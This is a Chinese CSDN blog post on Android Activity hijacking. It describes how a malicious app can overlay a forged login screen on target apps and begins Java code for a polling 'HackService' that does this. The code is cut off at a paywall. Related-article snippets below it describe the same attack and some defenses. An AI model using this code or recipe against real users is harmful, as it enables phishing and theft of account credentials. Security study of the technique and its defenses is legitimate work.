Android-Activity劫持

最新推荐文章于 2022-05-25 01:58:41 发布
最新推荐文章于 2022-05-25 01:58:41 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: Android Android移动安全 文章标签: android 移动安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_26533265/article/details/51171013
版权

Android-Acitivity劫持

由于Android的设计缺陷,当我们为Activity指定标志位FLAG_ ACTIVITY_ NEW_ TASK时,就能使Activity置于栈顶,并呈现给用户。

当然利用这个缺陷可以做很多羞羞的事情 【==】可以劫持用户信息,可以无限弹框(-。-;)等等ect.

今天我们来实现Activity劫持的代码:

1.通过遍历所有的进程,得到当前前台正在运行的应用进程

2.判断是否是目标进程,如果是启动伪造的Activity,对用户信息进行劫持。

hackService用于执行劫持主要逻辑

public class HackService extends Service {
//targetMap用于存放我们的目标程序
HashMap<String, Class<?>> targetMap = new HashMap<String, Class<?>>();
Handler handler = new Handler();
boolean isStart = false;

//我们新建一个Runnable对象,每隔200ms进行一次搜索
Runnable searchTarget = new Runnable() {
    @Override
    public void run() {
        //得到ActivityManager
        ActivityManager activityManager = (ActivityManager) getSystemService(Context.ACTIVITY_SERVICE);
        //通过ActivityManager将当前正在运行的进程存入processInfo中
        List<ActivityManager.RunningAppProcessInfo> processInfo = activityManager.getRunningAppProcesses();
        Log.w("恶意软件", "遍历进程");
        //遍历processInfo中的进程信息,看是否有我们的目标
        for (ActivityManager.RunningAppProcessInfo _processInfo : processInfo) {
            //若processInfo中的进程正在前台且是我们的目标进程,则调用hijack方法进行劫持
            if (_processInfo.importance == ActivityManager.RunningAppProcessInfo.IMPORTANCE_FOREGROUND) {
                if (targetMap.containsKey(_processInfo.
最低0.47元/天 解锁文章
无码不欢
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Android静态安全检查(五):Activity劫持
不忘初心的专栏
07-08 3688
什么是Activity劫持一般情况下分为两种第一种是,手机里面安装了恶意程序,恶意程序会注册一个Receiver,响应android.intent.action.BOOT_COMPLETED事件,这个Service会启动一个定时器,不停的循环查询当前运行的进程。一旦当前的进程正是我们要劫持的,并运行在前台,立马使用FLAG_ACTIVITY_NEW_TASK启动自己的恶意应用界面处于栈顶,用户看到...
Android Hook Activity 启动劫持
02-27
`Android Hook Activity 启动劫持`是一种高级技术,它允许开发者利用动态代理(Dynamic Proxy)技术来拦截并控制AMS的行为,从而在不修改系统源码的情况下,实现对Activity启动流程的监控或修改。 首先,我们需要...
android hook截取其他程序的按钮事件_神奇的Hook技术,一文读懂移动App逆向入门之Frida框架的简单使用...
weixin_39746794的博客
11-27 582
2019年末的一个偶然机会,听到了“frida”这个词语,作为刚入行的安全小白,我对这个词产生浓厚的兴趣,一步步走上了frida框架的学习之路。frida是一款基于python和java 的hook框架,可运行在Android、IOS、Linux和Widows等多个平台。期初,感觉这个框架真是有点意思,接触久了发现简直太有意思了,面对移动APP的时候,一旦拥有了Frida,也就拥有一切。本篇文章...
App客户端劫持及简单防护
云守护的专栏
07-02 4893
转自:http://blog.nsfocus.net/app-client-hijacking-simple-protection/Android APP客户端安全评估中,有一项叫做activity界面劫持。该bug的攻击场景是,当手机中的恶意APP检测到当前运行的为目标APP时,就启动自身的钓鱼界面覆盖到目标APP之上,以欺骗用户输入账号密码等。本文将要归纳Android各个版本可以使用的检测当...
PendingIntent劫持导致app任意文件读写漏洞
道阻且长,行则将至。
05-25 1918
本文在 Android 12 系统上将基于一个具体的 Demo 实例程序和 POC 利用程序,来介绍 Android 系统一种典型的攻击模式—— Pending 劫持导致 Intent 重定向、或者非法获取受害者 APP 应用的 FileProvider 读写权限(可形成命令执行漏洞)。
activity劫持劫持
nailsoul的专栏
09-17 2万+
1、Activity调度机制 android为了提高用户的用户体验,对于不同的应用程序之间的切换,基本上是无缝。他们切换的只是一个activity,让切换的到前台显示,另一个应用则被覆盖到后台,不可见。Activity的概念相当于一个与用户交互的界面。而Activity的调度是交由Android系统中的AmS管理的。AmS即ActivityManagerService(Activity管理服
Activity_Hijack.apk
04-19
安全建议:Activity劫持通常依靠注册Receiver响应android.intent.action.BOOT_COMPLETED事件。客户端程序可以在启动前检查Receiver并报警;由于Activity界面劫持攻击通常是将自己的页面附着在客户端之上,因此需要...
Android activity劫持
11-29
然而,由于Android的开放性,Activity可能会遭受恶意攻击,其中一种常见的方式就是Activity劫持。这通常发生在恶意应用通过不当手段获取到目标应用的Activity启动意图(Intent)后,提前启动或插入到目标Activity的...
activity劫持
03-04
Activity劫持】是一种Android应用安全问题,主要发生在Android系统的应用程序中。ActivityAndroid四大组件之一,用于构建用户界面并处理用户交互。当一个Activity劫持,攻击者可以恶意篡改其行为,例如在用户...
AntihijackUtil:Android 安全Activity 劫持防护
05-01
什么是 Activity 劫持 Android 为了提高用户的用户体验,对于不同的应用程序之间的切换,基本上是无缝。举一个例子,用户打开安卓手机上的某一应用例如支付宝,进入到登陆页面,这时恶意软件检测到用户的这一动作,...
Android Activity劫持方案
黄小梁的博客
08-25 4563
最近,安全合规部门又对金融类、银行类app进行了大规模的多方面安全检查,其中有一项安全问题:Activity劫持。其实Android界面防劫持我们app这边也是做了的,但是为啥还会有这些问题呢?自我感觉就是绝不会有此类问题,于是我们向检测部门要了劫持工具,但是事实往往是打脸的。。。。。 那么什么是Activity劫持呢?简单的说就是我们APP正常的Activity界面被恶意攻替换上仿冒的恶意Activity界面进行攻击和非法用途。界面劫持攻击通常难被识别出来,其造成的后果必然会给用户带来严重损失。 举个例.
AndroidActivity界面劫持劫持
热门推荐
LVXIANGAN的专栏
02-09 2万+
总结: Activity劫持原理1、注册一个receiver,响应android.intent.action.BOOT_COMPLETED,使得开机启动一个service;这个service,会启动一个计时器,不停循环查询所有当前运行的进程(因为app可以枚举系统当前运行进程而无需声明其他权限) 2、一旦发现当前某一进程的Activity正是我们想要劫持的,并运行在前台,我们立马使用FLAG_A...
Activity劫持实例与防护手段
知识搬运工,资料任你拿,包括书籍、电影、电视剧、网站、软件等,VX公人人人号:向前书局
09-28 3961
原文地址:http://blog.chinaunix.net/uid-29170659-id-4930737.html  (本文只用于学习技术,提高大家警觉,切勿用于非法用途!) 什么叫Activity劫持 这里举一个例子。用户打开安卓手机上的某一应用,进入到登陆页面,这时,恶意软件侦测到用户的这一动作,立即弹出一个与该应用 界面相同的Activity,覆盖掉了
app安全:如何应对界面劫持
听风-Android进阶
03-03 2万+
app安全:如何应对界面劫持 app安全如何应对界面劫持 界面劫持的原理 解决办法 具体实施 在Activity的各生命周期中启动或者停止服务在onResume中开启service在onStart和onDestory中关闭service 编写具体的Service逻辑 在onStart中执行timer 具体效果如图 补充内容写这篇文章是因为,公司的项目对安全性要求较高一些,所以每年都会不定时把app
Android安全——Activity劫持
joy
03-29 4453
Android安全——Activity劫持 一、activity劫持简介 DEFCON-19上公布的https://www.trustwave.com/spiderlabs/advisories/TWSL2011-008.txt android运行时,会在很多activity中进行切换,它自身维护着一个activity的历史栈,用于在用户点击bac
大谈android安全1——Activity劫持与用户防范
一个码农的博客
08-07 254
本文调度机制内容部分参考于网上博文,但代码及用户防范的方法均属原创,转载请注明出处 http://msdxblog.sinaapp.com/?p=623 或本人在此ITEYE的这一博客:http://maosidiaoxian.iteye.com/blog/1623016 本博客声明:此文仅为技术讨论,不对具体阅读者的行为负责。同时希望大家不要将此用于非法目的。 [b]1、Activity调度...
android set-home-activity
最新发布
06-09
你的问题是关于 Android 开发中如何设置启动的主界面,也就是 Home Activity。 要设置启动的主界面,需要在 AndroidManifest.xml 文件中进行配置。具体步骤如下: 1. 打开 AndroidManifest.xml 文件,在 <application> 标签下添加以下属性: ```xml <application ... android:label="Your App Name" android:icon="@mipmap/ic_launcher" android:roundIcon="@mipmap/ic_launcher_round" android:theme="@style/AppTheme" android:allowBackup="true" android:supportsRtl="true" android:resizeableActivity="false" android:hardwareAccelerated="true" android:requestLegacyExternalStorage="true" > <activity android:name=".MainActivity"> <intent-filter> <action android:name="android.intent.action.MAIN" /> <category android:name="android.intent.category.LAUNCHER" /> </intent-filter> </activity> ... </application> ``` 其中,`android:name` 属性指定了主界面的 Activity 类名,这里是 `.MainActivity`。注意,如果你的主界面 Activity 不是在顶层包下的,需要在前面加上包名,如 `com.example.myapp.MainActivity`。 2. 在 `<activity>` 标签中添加 `<intent-filter>` 标签,并指定 `android.intent.action.MAIN` 和 `android.intent.category.LAUNCHER` 两个属性。这样就会将该 Activity 设置为启动的主界面。 完成以上步骤后,重新运行应用程序,就会自动打开指定的主界面。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值